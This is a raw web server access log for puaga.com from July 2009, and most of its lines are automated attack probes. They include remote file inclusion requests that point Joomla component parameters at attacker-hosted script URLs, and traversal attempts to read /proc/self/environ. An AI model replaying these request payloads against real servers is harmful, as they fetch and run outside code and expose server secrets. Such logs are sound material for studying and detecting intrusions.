66.71.241.146 - - [05/Jul/2009:08:30:20 -0700] "GET /logs/access_090619.log//components/com_moofaq/includes/errors.php?error=http://www.die-grenzreiter.com/content/download/fx29id.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
82.146.58.249 - - [05/Jul/2009:08:30:34 -0700] "GET /?sIncPath=http://quangpham.info/wp-includes/images/blank.gif?? HTTP/1.1" 200 6125 "-" "libwww-perl/5.826" "www.puaga.com"
82.194.87.219 - - [05/Jul/2009:08:31:13 -0700] "GET /logs//index.php?sayfa=http://www.animeforum.com/impex/id? HTTP/1.1" 404 5258 "-" "libwww-perl/5.822" "www.puaga.com"
66.71.241.146 - - [05/Jul/2009:08:31:17 -0700] "GET /administrator/components/com_moofaq/css/errors.php?error=http://www.die-grenzreiter.com/content/download/fx29id.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
66.71.241.146 - - [05/Jul/2009:08:31:17 -0700] "GET /logs/access_090624.log//administrator/components/com_moofaq/css/errors.php?error=http://www.die-grenzreiter.com/content/download/fx29id.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
66.71.241.146 - - [05/Jul/2009:08:31:17 -0700] "GET /logs//administrator/components/com_moofaq/css/errors.php?error=http://www.die-grenzreiter.com/content/download/fx29id.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
66.71.241.146 - - [05/Jul/2009:08:31:29 -0700] "GET /logs/access_090619.log//administrator/components/com_moofaq/css/errors.php?error=http://www.die-grenzreiter.com/content/download/fx29id.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
82.194.87.219 - - [05/Jul/2009:08:31:44 -0700] "GET /logs//index.php?sayfa=http://www.animeforum.com/impex/id? HTTP/1.1" 404 5258 "-" "libwww-perl/5.822" "www.puaga.com"
66.71.241.146 - - [05/Jul/2009:08:32:07 -0700] "GET /logs/access_090628.log//components/com_moofaq/includes/errors.php?error=http://www.die-grenzreiter.com/content/download/fx29id.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
66.11.230.36 - - [05/Jul/2009:08:32:09 -0700] "GET /logs/access_090518.log%20%20//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.scoringsessions.com////img/large/2004/battlestargalactica/v4.5id1?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
66.11.230.36 - - [05/Jul/2009:08:32:10 -0700] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.scoringsessions.com////img/large/2004/battlestargalactica/v4.5id1?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
66.11.230.36 - - [05/Jul/2009:08:32:10 -0700] "GET /administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.scoringsessions.com////img/large/2004/battlestargalactica/v4.5id1?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
66.11.230.36 - - [05/Jul/2009:08:32:14 -0700] "GET /logs/access_090523.log%20%20//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.scoringsessions.com////img/large/2004/battlestargalactica/v4.5id1?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
89.223.3.98 - - [05/Jul/2009:08:32:17 -0700] "GET /logs/access_090612.log//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.samsunpanel.com/fx29id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
66.71.241.146 - - [05/Jul/2009:08:32:59 -0700] "GET /logs/access_090619.log%20%20//administrator/components/com_moofaq/css/errors.php?error=http://www.die-grenzreiter.com/content/download/fx29id.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
66.71.241.146 - - [05/Jul/2009:08:33:00 -0700] "GET /logs/access_090624.log%20%20//administrator/components/com_moofaq/css/errors.php?error=http://www.die-grenzreiter.com/content/download/fx29id.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
66.232.143.238 - - [05/Jul/2009:08:33:06 -0700] "GET /logs/access_090616.log/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://quangpham.info/wp-includes/images/blank.gif?? HTTP/1.1" 404 5258 "-" "libwww-perl/5.805" "www.puaga.com"
66.232.143.238 - - [05/Jul/2009:08:33:07 -0700] "GET /administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://quangpham.info/wp-includes/images/blank.gif?? HTTP/1.1" 404 5258 "-" "libwww-perl/5.805" "www.puaga.com"
66.232.143.238 - - [05/Jul/2009:08:33:08 -0700] "GET /logs/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://quangpham.info/wp-includes/images/blank.gif?? HTTP/1.1" 404 5258 "-" "libwww-perl/5.805" "www.puaga.com"
66.11.230.36 - - [05/Jul/2009:08:33:10 -0700] "GET /logs/access_090525.log%20%20//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.scoringsessions.com////img/large/2004/battlestargalactica/v4.5id1?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
85.214.147.206 - - [05/Jul/2009:08:33:20 -0700] "GET /logs/access_090529.log//?DOCUMENT_ROOT=http://computercabling.ca/ta//lib/ram/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
119.245.138.143 - - [05/Jul/2009:08:33:23 -0700] "GET /logs/access_090518.log//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://computercabling.ca/ta//lib/ram/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
119.245.138.143 - - [05/Jul/2009:08:33:23 -0700] "GET /logs/access_090523.log//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://computercabling.ca/ta//lib/ram/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
119.245.138.143 - - [05/Jul/2009:08:33:23 -0700] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://computercabling.ca/ta//lib/ram/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
119.245.138.143 - - [05/Jul/2009:08:33:23 -0700] "GET /administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://computercabling.ca/ta//lib/ram/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
66.11.230.36 - - [05/Jul/2009:08:33:34 -0700] "GET /logs/access_090612.log%20%20//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.scoringsessions.com////img/large/2004/battlestargalactica/v4.5id1?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
66.11.230.36 - - [05/Jul/2009:08:33:47 -0700] "GET /logs/access_090608.log%20%20//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.scoringsessions.com////img/large/2004/battlestargalactica/v4.5id1?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
72.30.87.93 - - [05/Jul/2009:08:34:54 -0700] "GET /logs/access_090215.log HTTP/1.0" 404 5258 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "www.puaga.com"
207.210.89.18 - - [05/Jul/2009:08:34:56 -0700] "GET /logs//components/com_flyspray/startdown.php?file=http://www.univers-du-pin.be/buggsbunny?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7" "www.puaga.com"
207.210.89.18 - - [05/Jul/2009:08:34:56 -0700] "GET /components/com_flyspray/startdown.php?file=http://www.univers-du-pin.be/buggsbunny?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7" "www.puaga.com"
207.210.89.18 - - [05/Jul/2009:08:34:56 -0700] "GET /logs/access_090617.log//components/com_flyspray/startdown.php?file=http://www.univers-du-pin.be/buggsbunny?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7" "www.puaga.com"
207.210.89.18 - - [05/Jul/2009:08:34:56 -0700] "GET /logs/access_090617.log/errors.php?error=http://www.univers-du-pin.be/buggsbunny?? HTTP/1.1" 404 5258 "-" "Mozilla/4.0 (compatible; MSIE 5.23; Mac_PowerPC)" "www.puaga.com"
207.210.89.18 - - [05/Jul/2009:08:34:56 -0700] "GET /errors.php?error=http://www.univers-du-pin.be/buggsbunny?? HTTP/1.1" 404 5258 "-" "Mozilla/4.0 (compatible; MSIE 5.23; Mac_PowerPC)" "www.puaga.com"
207.210.89.18 - - [05/Jul/2009:08:34:56 -0700] "GET /logs/errors.php?error=http://www.univers-du-pin.be/buggsbunny?? HTTP/1.1" 404 5258 "-" "Mozilla/4.0 (compatible; MSIE 5.23; Mac_PowerPC)" "www.puaga.com"
207.210.89.18 - - [05/Jul/2009:08:34:56 -0700] "GET /logs/access_090617.log//components/com_flyspray/startdown.php?file=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ HTTP/1.1" 404 5258 "-" "XXXXXX" "www.puaga.com"
207.210.89.18 - - [05/Jul/2009:08:34:56 -0700] "GET /components/com_flyspray/startdown.php?file=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ HTTP/1.1" 404 5258 "-" "XXXXXX" "www.puaga.com"
207.210.89.18 - - [05/Jul/2009:08:34:56 -0700] "GET /logs//components/com_flyspray/startdown.php?file=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ HTTP/1.1" 404 5258 "-" "XXXXXX" "www.puaga.com"
207.210.89.18 - - [05/Jul/2009:08:34:56 -0700] "GET /logs/access_090617.log//components/com_flyspray/startdown.php?file=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 5258 "-" "XXXXXX" "www.puaga.com"
207.210.89.18 - - [05/Jul/2009:08:34:56 -0700] "GET /components/com_flyspray/startdown.php?file=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 5258 "-" "XXXXXX" "www.puaga.com"
207.210.89.18 - - [05/Jul/2009:08:34:56 -0700] "GET /logs//components/com_flyspray/startdown.php?file=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 5258 "-" "XXXXXX" "www.puaga.com"
207.210.89.18 - - [05/Jul/2009:08:35:05 -0700] "GET /logs/access_090517.log//components/com_flyspray/startdown.php?file=http://www.univers-du-pin.be/buggsbunny?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7" "www.puaga.com"
207.210.89.18 - - [05/Jul/2009:08:35:05 -0700] "GET /logs/access_090517.log/errors.php?error=http://www.univers-du-pin.be/buggsbunny?? HTTP/1.1" 404 5258 "-" "Mozilla/4.0 (compatible; MSIE 5.23; Mac_PowerPC)" "www.puaga.com"
207.210.89.18 - - [05/Jul/2009:08:35:05 -0700] "GET /logs/access_090517.log//components/com_flyspray/startdown.php?file=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ HTTP/1.1" 404 5258 "-" "XXXXXX" "www.puaga.com"
207.210.89.18 - - [05/Jul/2009:08:35:05 -0700] "GET /logs/access_090517.log//components/com_flyspray/startdown.php?file=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 5258 "-" "XXXXXX" "www.puaga.com"
88.191.37.60 - - [05/Jul/2009:08:35:15 -0700] "GET /logs////?_SERVER[DOCUMENT_ROOT]=http://extranet.teligentems.com/uiu.txt??? HTTP/1.1" 200 4806 "-" "Mozilla/5.0" "www.puaga.com"
88.191.37.60 - - [05/Jul/2009:08:35:15 -0700] "GET ///?_SERVER[DOCUMENT_ROOT]=http://extranet.teligentems.com/uiu.txt??? HTTP/1.1" 200 6125 "-" "Mozilla/5.0" "www.puaga.com"
88.191.37.60 - - [05/Jul/2009:08:35:17 -0700] "GET /logs/access_090514.log%20%20////?_SERVER[DOCUMENT_ROOT]=http://extranet.teligentems.com/uiu.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
201.232.54.48 - - [05/Jul/2009:08:35:42 -0700] "GET /logs/access_090514.log////?_SERVER[DOCUMENT_ROOT]=http://extranet.teligentems.com/uiu.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
84.17.129.100 - - [05/Jul/2009:08:36:29 -0700] "GET /logs/access_090605.log%20%20/?sourcedir=http://fritzcomforthomes.com/copyright[1].txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
84.17.129.100 - - [05/Jul/2009:08:37:04 -0700] "GET /logs/access_090611.log%20%20/?sourcedir=http://fritzcomforthomes.com/copyright[1].txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
72.30.87.93 - - [05/Jul/2009:08:37:19 -0700] "GET /logs/access_090702.log HTTP/1.0" 200 1635010 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "www.puaga.com"
201.232.54.48 - - [05/Jul/2009:08:37:22 -0700] "GET /logs/access_090611.log////?_SERVER[DOCUMENT_ROOT]=http://extranet.teligentems.com/uiu.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
66.232.143.238 - - [05/Jul/2009:08:37:48 -0700] "GET /logs/access_090611.log/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://quangpham.info/wp-includes/images/blank.gif?? HTTP/1.1" 404 5258 "-" "libwww-perl/5.805" "www.puaga.com"
89.223.3.98 - - [05/Jul/2009:08:38:22 -0700] "GET /logs/access_090529.log//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.samsunpanel.com/fx29id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
66.232.143.238 - - [05/Jul/2009:08:38:47 -0700] "GET /administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://quangpham.info/wp-includes/images/blank.gif?? HTTP/1.1" 404 5258 "-" "libwww-perl/5.805" "www.puaga.com"
62.149.163.198 - - [05/Jul/2009:08:39:35 -0700] "GET /logs//components/com_flyspray/startdown.php?file=http://www.univers-du-pin.be/buggsbunny?? HTTP/1.1" 404 5258 "-" "Mozilla/1.22 (compatible; MSIE 1.5; Windows NT)" "www.puaga.com"
62.149.163.198 - - [05/Jul/2009:08:39:35 -0700] "GET /components/com_flyspray/startdown.php?file=http://www.univers-du-pin.be/buggsbunny?? HTTP/1.1" 404 5258 "-" "Mozilla/1.22 (compatible; MSIE 1.5; Windows NT)" "www.puaga.com"
62.149.163.198 - - [05/Jul/2009:08:39:35 -0700] "GET /logs/access_090617.log//components/com_flyspray/startdown.php?file=http://www.univers-du-pin.be/buggsbunny?? HTTP/1.1" 404 5258 "-" "Mozilla/1.22 (compatible; MSIE 1.5; Windows NT)" "www.puaga.com"
62.149.163.198 - - [05/Jul/2009:08:39:35 -0700] "GET /logs/access_090517.log//components/com_flyspray/startdown.php?file=http://www.univers-du-pin.be/buggsbunny?? HTTP/1.1" 404 5258 "-" "Mozilla/1.22 (compatible; MSIE 1.5; Windows NT)" "www.puaga.com"
62.149.163.198 - - [05/Jul/2009:08:39:35 -0700] "GET /logs/access_090617.log/errors.php?error=http://www.univers-du-pin.be/buggsbunny?? HTTP/1.1" 404 5258 "-" "Mozilla/4.0 (compatible; MSIE 5.0; SunOS 5.9 sun4u; X11)" "www.puaga.com"
62.149.163.198 - - [05/Jul/2009:08:39:35 -0700] "GET /logs/access_090517.log/errors.php?error=http://www.univers-du-pin.be/buggsbunny?? HTTP/1.1" 404 5258 "-" "Mozilla/4.0 (compatible; MSIE 5.0; SunOS 5.9 sun4u; X11)" "www.puaga.com"
62.149.163.198 - - [05/Jul/2009:08:39:35 -0700] "GET /errors.php?error=http://www.univers-du-pin.be/buggsbunny?? HTTP/1.1" 404 5258 "-" "Mozilla/4.0 (compatible; MSIE 5.0; SunOS 5.9 sun4u; X11)" "www.puaga.com"
62.149.163.198 - - [05/Jul/2009:08:39:35 -0700] "GET /logs/errors.php?error=http://www.univers-du-pin.be/buggsbunny?? HTTP/1.1" 404 5258 "-" "Mozilla/4.0 (compatible; MSIE 5.0; SunOS 5.9 sun4u; X11)" "www.puaga.com"
62.149.163.198 - - [05/Jul/2009:08:39:35 -0700] "GET /logs/access_090617.log//components/com_flyspray/startdown.php?file=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ HTTP/1.1" 404 5258 "-" "XXXXXX" "www.puaga.com"
62.149.163.198 - - [05/Jul/2009:08:39:35 -0700] "GET /logs/access_090517.log//components/com_flyspray/startdown.php?file=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ HTTP/1.1" 404 5258 "-" "XXXXXX" "www.puaga.com"
62.149.163.198 - - [05/Jul/2009:08:39:35 -0700] "GET /components/com_flyspray/startdown.php?file=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ HTTP/1.1" 404 5258 "-" "XXXXXX" "www.puaga.com"
62.149.163.198 - - [05/Jul/2009:08:39:35 -0700] "GET /logs//components/com_flyspray/startdown.php?file=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ HTTP/1.1" 404 5258 "-" "XXXXXX" "www.puaga.com"
62.149.163.198 - - [05/Jul/2009:08:39:36 -0700] "GET /logs/access_090617.log//components/com_flyspray/startdown.php?file=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 5258 "-" "XXXXXX" "www.puaga.com"
62.149.163.198 - - [05/Jul/2009:08:39:36 -0700] "GET /logs/access_090517.log//components/com_flyspray/startdown.php?file=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 5258 "-" "XXXXXX" "www.puaga.com"
62.149.163.198 - - [05/Jul/2009:08:39:36 -0700] "GET /components/com_flyspray/startdown.php?file=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 5258 "-" "XXXXXX" "www.puaga.com"
62.149.163.198 - - [05/Jul/2009:08:39:36 -0700] "GET /logs//components/com_flyspray/startdown.php?file=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 5258 "-" "XXXXXX" "www.puaga.com"
94.229.66.202 - - [05/Jul/2009:08:39:50 -0700] "GET /logs/access_090606.log/components/com_pccookbook/pccookbook.php?mosConfig_absolute_path=http://www.thebalvenie.com/files/id.txt??? HTTP/1.1" 404 5258 "-" "libwww-perl/5.810" "www.puaga.com"
94.229.66.202 - - [05/Jul/2009:08:39:50 -0700] "GET /components/com_pccookbook/pccookbook.php?mosConfig_absolute_path=http://www.thebalvenie.com/files/id.txt??? HTTP/1.1" 404 5258 "-" "libwww-perl/5.810" "www.puaga.com"
94.229.66.202 - - [05/Jul/2009:08:39:53 -0700] "GET /logs/components/com_pccookbook/pccookbook.php?mosConfig_absolute_path=http://www.thebalvenie.com/files/id.txt??? HTTP/1.1" 404 5258 "-" "libwww-perl/5.810" "www.puaga.com"
94.229.66.202 - - [05/Jul/2009:08:40:09 -0700] "GET /logs/access_090614.log/components/com_pccookbook/pccookbook.php?mosConfig_absolute_path=http://www.thebalvenie.com/files/id.txt??? HTTP/1.1" 404 5258 "-" "libwww-perl/5.810" "www.puaga.com"
62.58.32.74 - - [05/Jul/2009:08:41:18 -0700] "GET /logs/access_090605.log/e404.php?DOCUMENT_ROOT=http://www.avanceinternet.com/cms/media/id.txt? HTTP/1.1" 404 5258 "-" "libwww-perl/5.805" "www.puaga.com"
62.58.32.74 - - [05/Jul/2009:08:41:19 -0700] "GET /e404.php?DOCUMENT_ROOT=http://www.avanceinternet.com/cms/media/id.txt? HTTP/1.1" 404 5258 "-" "libwww-perl/5.805" "www.puaga.com"
62.58.32.74 - - [05/Jul/2009:08:41:19 -0700] "GET /logs/e404.php?DOCUMENT_ROOT=http://www.avanceinternet.com/cms/media/id.txt? HTTP/1.1" 404 5258 "-" "libwww-perl/5.805" "www.puaga.com"
65.55.106.234 - - [05/Jul/2009:08:41:39 -0700] "GET /robots.txt HTTP/1.1" 200 36 "-" "msnbot/2.0b (+http://search.msn.com/msnbot.htm)" "www.puaga.com"
66.71.241.146 - - [05/Jul/2009:08:42:22 -0700] "GET /logs/access_090628.log//components/com_moofaq/includes/file_includer.php?gzip=0&file=http://www.die-grenzreiter.com/content/download/fx29id.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
66.232.143.238 - - [05/Jul/2009:08:43:05 -0700] "GET /?sIncPath=http://quangpham.info/wp-includes/images/blank.gif?? HTTP/1.1" 200 6125 "-" "libwww-perl/5.805" "www.puaga.com"
61.78.62.84 - - [05/Jul/2009:08:44:10 -0700] "GET /logs/send_reminders.php?includedir=http://spiskin.trakya.edu.tr/tr/images/phocagallery/lepra/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
61.78.62.84 - - [05/Jul/2009:08:44:10 -0700] "GET /logs/access_090601.log%20%20/send_reminders.php?includedir=http://spiskin.trakya.edu.tr/tr/images/phocagallery/lepra/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
61.78.62.84 - - [05/Jul/2009:08:44:11 -0700] "GET /send_reminders.php?includedir=http://spiskin.trakya.edu.tr/tr/images/phocagallery/lepra/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
61.78.62.84 - - [05/Jul/2009:08:44:12 -0700] "GET /send_reminders.php?includedir=http://spiskin.trakya.edu.tr/tr/images/phocagallery/lepra/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
61.78.62.84 - - [05/Jul/2009:08:44:12 -0700] "GET /logs/access_090601.log/send_reminders.php?includedir=http://spiskin.trakya.edu.tr/tr/images/phocagallery/lepra/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
61.78.62.84 - - [05/Jul/2009:08:44:12 -0700] "GET /logs/send_reminders.php?includedir=http://spiskin.trakya.edu.tr/tr/images/phocagallery/lepra/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
61.78.62.84 - - [05/Jul/2009:08:44:13 -0700] "GET /logs/access_090514.log%20%20/send_reminders.php?includedir=http://spiskin.trakya.edu.tr/tr/images/phocagallery/lepra/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
61.78.62.84 - - [05/Jul/2009:08:44:18 -0700] "GET /logs/access_090514.log/send_reminders.php?includedir=http://spiskin.trakya.edu.tr/tr/images/phocagallery/lepra/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.226.134.29 - - [05/Jul/2009:08:44:39 -0700] "GET /logs/access_090605.log/e404.php?DOCUMENT_ROOT=http://www.avanceinternet.com/cms/media/id.txt? HTTP/1.1" 404 5258 "-" "libwww-perl/5.803" "www.puaga.com"
200.226.134.29 - - [05/Jul/2009:08:44:39 -0700] "GET /logs/access_090605.log/e404.php?DOCUMENT_ROOT=http://www.avanceinternet.com/cms/media/id.txt? HTTP/1.1" 404 5258 "-" "libwww-perl/5.803" "www.puaga.com"
200.226.134.29 - - [05/Jul/2009:08:44:39 -0700] "GET /e404.php?DOCUMENT_ROOT=http://www.avanceinternet.com/cms/media/id.txt? HTTP/1.1" 404 5258 "-" "libwww-perl/5.803" "www.puaga.com"
200.226.134.29 - - [05/Jul/2009:08:44:39 -0700] "GET /e404.php?DOCUMENT_ROOT=http://www.avanceinternet.com/cms/media/id.txt? HTTP/1.1" 404 5258 "-" "libwww-perl/5.803" "www.puaga.com"
200.226.134.29 - - [05/Jul/2009:08:44:40 -0700] "GET /logs/e404.php?DOCUMENT_ROOT=http://www.avanceinternet.com/cms/media/id.txt? HTTP/1.1" 404 5258 "-" "libwww-perl/5.803" "www.puaga.com"
200.226.134.29 - - [05/Jul/2009:08:44:40 -0700] "GET /logs/e404.php?DOCUMENT_ROOT=http://www.avanceinternet.com/cms/media/id.txt? HTTP/1.1" 404 5258 "-" "libwww-perl/5.803" "www.puaga.com"
66.71.241.146 - - [05/Jul/2009:08:44:56 -0700] "GET /logs/access_090628.log//administrator/components/com_moofaq/css/errors.php?error=http://www.die-grenzreiter.com/content/download/fx29id.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
71.3.235.15 - - [05/Jul/2009:08:45:03 -0700] "GET /ideal/forum/posting.php?mode=reply&t=4184 HTTP/1.0" 404 5258 "http://www.topnotchcarpentry.com" "Mozilla/4.0 (compatible; MSIE 6.0; Windows XP)" "puaga.com"
71.3.235.15 - - [05/Jul/2009:08:45:03 -0700] "GET / HTTP/1.0" 200 6109 "http://puaga.com/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows XP)" "puaga.com"
71.3.235.15 - - [05/Jul/2009:08:45:05 -0700] "GET /login/register.php HTTP/1.0" 200 4973 "http://puaga.com/login/register.php" "Mozilla/4.0 (compatible; MSIE 6.0; Windows XP)" "puaga.com"
71.3.235.15 - - [05/Jul/2009:08:45:05 -0700] "POST /login/register.php HTTP/1.0" 200 4973 "http://puaga.com/login/register.php" "Mozilla/4.0 (compatible; MSIE 6.0; Windows XP)" "puaga.com"
71.3.235.15 - - [05/Jul/2009:08:45:05 -0700] "GET /ideal/forum/posting.php?mode=reply&t=4184 HTTP/1.0" 404 5258 "http://puaga.com/ideal/forum//posting.php?mode=reply&t=4184" "Mozilla/4.0 (compatible; MSIE 6.0; Windows XP)" "puaga.com"
71.3.235.15 - - [05/Jul/2009:08:45:06 -0700] "GET /forum/posting.php?mode=reply&t=4184 HTTP/1.0" 404 5258 "http://puaga.com/forum/posting.php?mode=reply&t=4184" "Mozilla/4.0 (compatible; MSIE 6.0; Windows XP)" "puaga.com"
71.3.235.15 - - [05/Jul/2009:08:45:06 -0700] "GET /ideal/forum/posting.php?mode=reply&t=4184 HTTP/1.0" 404 5258 "http://puaga.com/ideal/forum//posting.php?mode=reply&t=4184" "Mozilla/4.0 (compatible; MSIE 6.0; Windows XP)" "puaga.com"
71.3.235.15 - - [05/Jul/2009:08:45:06 -0700] "GET /forum/posting.php?mode=reply&t=4184 HTTP/1.0" 404 5258 "http://puaga.com/forum/posting.php?mode=reply&t=4184" "Mozilla/4.0 (compatible; MSIE 6.0; Windows XP)" "puaga.com"
71.3.235.15 - - [05/Jul/2009:08:45:06 -0700] "GET /ideal/forum/index.php HTTP/1.0" 404 5258 "http://puaga.com/ideal/forum//index.php" "Mozilla/4.0 (compatible; MSIE 6.0; Windows XP)" "puaga.com"
71.3.235.15 - - [05/Jul/2009:08:45:06 -0700] "GET /forum/index.php HTTP/1.0" 404 5258 "http://puaga.com/forum/index.php" "Mozilla/4.0 (compatible; MSIE 6.0; Windows XP)" "puaga.com"
88.191.37.60 - - [05/Jul/2009:08:45:09 -0700] "GET ///?_SERVER[DOCUMENT_ROOT]=http://game24x7.com/_a?? HTTP/1.1" 200 6125 "-" "Mozilla/5.0" "www.puaga.com"
